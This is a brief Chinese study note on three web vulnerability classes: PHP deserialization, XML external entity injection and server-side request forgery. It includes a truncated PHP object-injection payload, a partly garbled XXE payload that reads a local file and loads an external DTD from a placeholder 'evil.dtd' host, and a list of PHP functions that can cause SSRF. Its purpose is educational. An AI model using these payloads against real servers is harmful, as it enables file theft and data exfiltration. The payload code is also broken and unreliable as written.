反序列化,XXE,SSRF

serialize($test)序列化 

unserialize($test2)反序列化

payload:O:1:"S":1:{s:4:"test";s:29:""

XXE(XML External Entity Injection) 全称为 XML 外部实体注入

payload中file:///d:/test.txt 为注入点,外部实体

1 <?xml version="1.0" encoding="utf-8"?> 
2 DOCTYPE roottag [
3 "">   
4 "file:///d:/test.txt">  
5 "]]>">  
6 "http://ip/evil.dtd"> 
7 %dtd; ]> 
8 
9 &all;

SSRF全称为服务器端请求伪造

  攻击者→服务器→目标地址 

php中以下函数使用不当会导致ssrf

file_get_contents()
fsockopen()
curl_exec() 
漏洞知识

相关

标签